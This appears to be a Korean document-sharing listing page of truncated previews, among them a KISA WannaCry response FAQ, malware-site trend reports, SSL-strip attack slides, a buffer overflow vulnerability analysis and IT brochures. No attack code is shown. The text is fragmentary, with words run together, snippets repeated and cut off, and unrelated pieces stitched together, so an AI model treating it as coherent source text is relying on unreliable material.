- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨 QnA 형식으로알아보는 WannaCry 랜섬웨어 대응가이드 2017. 05 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. - 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요?

More information

The Pocket Guide to TCP/IP Sockets: C Version

The Pocket Guide to  TCP/IP Sockets: C Version 인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)

More information

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1 악성코드은닉사이트탐지 동향보고서 17 년상반기 1 ` 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 4 2.1 악성코드유포지현황 4 - 유포지탐지현황 4 - 대량경유지가탐지된유포지 TOP10 5 - 악성코드취약점및취약한 S/W 악용현황 6 - 악성코드유형별비율 7 - 위협 IP 및도메인현황 8 2.2 악성코드경유지현황 9 - 경유지탐지 업종별비율

More information

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com Content 1. SSL Strip - SSL? - SSL MITM - SSL Strip 2. SSL Strip 공격 3. 대응방법 Copyright@2012 All Rights Reserved by SemiDntmd 2 1. SSL Strip 1-1

More information

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대 Non-ActiveX 방식의 메일암호화 솔루션 1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대응 및 운영 비용이 증가하는 원인이 되어 개선이

More information

[Brochure] KOR_TunA

[Brochure] KOR_TunA LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /

More information

uFOCS

uFOCS 1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All

More information

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환 취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

More information

Tech Trends 클라우드 버스팅의 현주소와 과제 아직 완벽한 클라우드 버스팅을 위해 가야 할 길이 멀지만, 하이브리드 클라우드는 충분한 이점을 가져다 준다. Robert L. Scheier Networkworld 매끄러운 클라우드 버스팅(Cloud Bursting

Tech Trends 클라우드 버스팅의 현주소와 과제 아직 완벽한 클라우드 버스팅을 위해 가야 할 길이 멀지만, 하이브리드 클라우드는 충분한 이점을 가져다 준다. Robert L. Scheier Networkworld 매끄러운 클라우드 버스팅(Cloud Bursting I D G D e e p D i v e Seamless Cloud 궁극의 클라우드 하이브리드 클라우드의 과제와 해법 클라우드를 이용해 자체 IT, 자원을 보완하는 것은 기업이 일상적인 워크로드를 위한 인프라만을 구축하고, 일시적인 과부 하를 필요할 때만 클라우드에 넘겨주는 가장 이상적인 상태 중 하나이다. 여기에 재해 복구나 비즈니스 연속성을 위한 새 로운

More information

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다. PDMLink 에등록된 Office 문서들의 PDF 문서변환기능및 Viewer 기능을알아보자 PDM Link에서지원하는 [Product View Document Support] 기능은 Windows-Base 기반의 Microsoft Office 문서들을 PDMLink용 Viewer인 Product View를통한읽기가가능한 PDF Format 으로변환하는기능이다.

More information

07_alman.hwp

07_alman.hwp 1. 개요 Alman 바이러스는국내에서감염피해가다수보고되었다. 여기서는 Alman 바이러스변종 에감염될경우의악성기능에대하여살펴보았다. Alman은감염된시스템내의실행파일들을추가로감염시킨다. 타시스템사용자가감염된실행파일들을감염여부를확인하지않고복사하여사용할경우감염되게된다. 또한, 네트워크공유폴더와이동디스크를통하여전파되므로, 윈도우암호와공유폴더암호를추측하기어렵게설정하고주기적으로이동저장매체에대한백신점검을실시하는것이필요하다.

More information

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.

More information

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

컴퓨터관리2번째시간

컴퓨터관리2번째시간 Company 컴퓨터 관리 참고 자료 PC 운영체제 POST 기능 :, ROM BIOS ( : [F8]) 1. Windows XP Windows XP 사용자 계정 :,,, 강화된 디지털 미디어 지원 기능 : (Windows Movie Maker), CD (Windows Media Player), Windows 홈 네트워크 기능 :, 강화된 시스템 관리 :,

More information

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

354-437-4..

354-437-4.. 357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%

More information

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

Adobe Flash 취약점 분석 (CVE-2012-0754)

Adobe Flash 취약점 분석 (CVE-2012-0754) 기술문서 14. 08. 13. 작성 GNU C library dynamic linker $ORIGIN expansion Vulnerability Author : E-Mail : 윤지환 131ackcon@gmail.com Abstract 2010 년 Tavis Ormandy 에 의해 발견된 취약점으로써 정확한 명칭은 GNU C library dynamic linker

More information

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

Analyst Briefing

Analyst Briefing . Improve your Outlook on Email and File Management iseminar.. 1544(or 6677)-3355 800x600. iseminar Chat... Improve your Outlook on Email and File Management :, 2003 1 29.. Collaboration Suite - Key Messages

More information

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

F1-1(수정).ppt

F1-1(수정).ppt , thcho@kisaorkr IPAK (Information Protection Assessment Kit) IAM (INFOSEC Assessment Methodology) 4 VAF (Vulnerability Assessment Framework) 5 OCTAVE (Operationally Critical Threat, Asset, and Vulnerability

More information

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드] Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google

More information

vm-웨어-01장

vm-웨어-01장 Chapter 16 21 (Agenda). (Green),., 2010. IT IT. IT 2007 3.1% 2030 11.1%, IT 2007 1.1.% 2030 4.7%, 2020 4 IT. 1 IT, IT. (Virtualization),. 2009 /IT 2010 10 2. 6 2008. 1970 MIT IBM (Mainframe), x86 1. (http

More information

Scene7 Media Portal 사용

Scene7 Media Portal 사용 ADOBE SCENE7 MEDIA PORTAL http://help.adobe.com/ko_kr/legalnotices/index.html. iii 1 : Media Portal..................................................................................................................

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

슬라이드 1

슬라이드 1 Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치

More information

유포지탐지동향

유포지탐지동향 월간악성코드은닉사이트탐지 동향보고서 (7 월 ) 2014. 08. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 3. 악성코드은닉사례분석

More information

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation 1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP

More information

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved. Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.

More information

TTA Journal No.157_서체변경.indd

TTA Journal No.157_서체변경.indd 표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH

More information

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition

More information

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3 CR-15-59 AhnLab Policy Center 4.6 for Windows 인증보고서 인증번호 : ISIS-0631-2015 2015년 7월 IT보안인증사무국 1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정

More information

목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션 4: 결론 14 섹션 5: 참조 자료 15 섹션 6: 저자 소개 16 2

목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션 4: 결론 14 섹션 5: 참조 자료 15 섹션 6: 저자 소개 16 2 백서 표적 공격 2012년 7월 APT(지능형 지속 위협) 차단을 위한 전면적인 철저한 방어 Russell Miller CA Technologies 보안 관리 사업부 agility made possible 목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션

More information

Business Agility () Dynamic ebusiness, RTE (Real-Time Enterprise) IT Web Services c c WE-SDS (Web Services Enabled SDS) SDS SDS Service-riented Architecture Web Services ( ) ( ) ( ) / c IT / Service- Service-

More information

Microsoft PowerPoint - 10Àå.ppt

Microsoft PowerPoint - 10Àå.ppt 10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어

More information

Dropbox Forensics

Dropbox Forensics Cloud Storage Forensics Part I : Dropbox 2013. 09. 28 forensic.n0fate.com Dropbox Forensics Dropbox Forensics Dropbox 웹기반파일공유서비스 총 12 개의클라이언트지원 Desktop : Windows, Mac OS X, Linux Mobile : ios, Android,

More information

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D> VHDL 프로그래밍 D. 논리합성및 Xilinx ISE 툴사용법 학습목표 Xilinx ISE Tool 을이용하여 Xilinx 사에서지원하는해당 FPGA Board 에맞는논리합성과정을숙지 논리합성이가능한코드와그렇지않은코드를구분 Xilinx Block Memory Generator를이용한 RAM/ ROM 생성하는과정을숙지 2/31 Content Xilinx ISE

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 사용자계정관리 운영체제실습 목차 Ⅲ. 사용자계정관리 4.1 사용자계정관리 4.2 그룹관리 4.3 사용자계정관련파일 4.4 패스워드관리 4.5 사용자신분확인 4.1 사용자계정관리 사용자생성관련명령어 사용자생성 : useradd / adduser 사용자삭제 : userdel 사용자정보변경 : usermod 패스워드설정및변경 : passwd 그룹생성관련명령어 group

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%

More information

목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정

목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정 W2K8 R2 RemoteApp 및 Web Access 설치 및 구성 Step-By-Step 가이드 Microsoft Korea 이 동 철 부장 2009. 10 페이지 1 / 60 목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host)

More information

ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC

ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC Security Trend ASEC REPORT VOL.81 September, 2016 ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

2. 워너크라이국내확산및피해현황 공격시기 : 2017년 5월 12일 ( 금 ) 전후 국내피해현황 : 구분피해대상피해내용감염경로 글로벌 제조업 제조공정서버및 PC 감염 공장일부 가동중지 글로벌 본사 대기업보안관제센터모니터링 PC 감염 PC 운영중단및포맷인터넷 의료기관대형

2. 워너크라이국내확산및피해현황 공격시기 : 2017년 5월 12일 ( 금 ) 전후 국내피해현황 : 구분피해대상피해내용감염경로 글로벌 제조업 제조공정서버및 PC 감염 공장일부 가동중지 글로벌 본사 대기업보안관제센터모니터링 PC 감염 PC 운영중단및포맷인터넷 의료기관대형 [ 본자료는한국랜섬웨어침해대응센터의자산이므로참고하실때반드시출처를명기해주시기바랍니다 ] 긴급랜섬웨어침해보고서 발행일시 일 연락처 발행번호 이메일 발행처 한국랜섬웨어침해대응센터 센터장이형택 [ 워너크라이 WannaCry 랜섬웨어긴급침해보고서 ] 5 월 12 일전후무차별유포, 전세계 74 개국으로피해확산, 한국도피해발생 랜섬웨어해커동맹에의한사상최대공격, PC 와

More information

*

* Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46

More information

접근제어 시간은 없고, IT투자 비용이 정해져 있다면, 조금 더 스마트하게 제어하는 방법을 모색해야 한다. 그 중 하나 로 상황별 맞춤 보안 정책(Contextual security) 을 제 안한다. 상황별 맞춤 보안은 민감한 데이터와 그렇지 않은 것을 구분한 후 민감

접근제어 시간은 없고, IT투자 비용이 정해져 있다면, 조금 더 스마트하게 제어하는 방법을 모색해야 한다. 그 중 하나 로 상황별 맞춤 보안 정책(Contextual security) 을 제 안한다. 상황별 맞춤 보안은 민감한 데이터와 그렇지 않은 것을 구분한 후 민감 상황별 맞춤형 보안 정책 지능형 위협 차단과 서비스 지속성 사용성 보장해야 기업 담당자는 어떻게 효과적으로 보안 정책을 제공할 수 있을까? 시간은 없고, IT투자 비용이 정해져 있다면 보다 스마트하게 제 어하는 방법을 모색해야만 한다. 그 대안으로 상황별 맞춤 보안 정책(Contextual security) 이 제안된다. 상황별 맞춤 보안은 민감 한 데이터와

More information

Microsoft PowerPoint - chap01-C언어개요.pptx

Microsoft PowerPoint - chap01-C언어개요.pptx #include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을

More information

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo 메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Synergy EDMS www.comtrue.com opyright 2001 ComTrue Technologies. All right reserved. - 1 opyright 2001 ComTrue Technologies. All right reserved. - 2 opyright 2001 ComTrue Technologies. All right reserved.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Hybrid Cloud 를위한유연한보안전략 맥아피 ( 유클릭 ) 김경운팀장 목차. Data Center 의변화및과제 2. Hybrid Cloud 에대한보안대두 3. Hybrid Cloud 에대한보안전략 4. Cloud Data 보호전략 (CASB) Data Center 의변화및과제 민첩성및유연성을기반으로 business focused Data Center 로변화

More information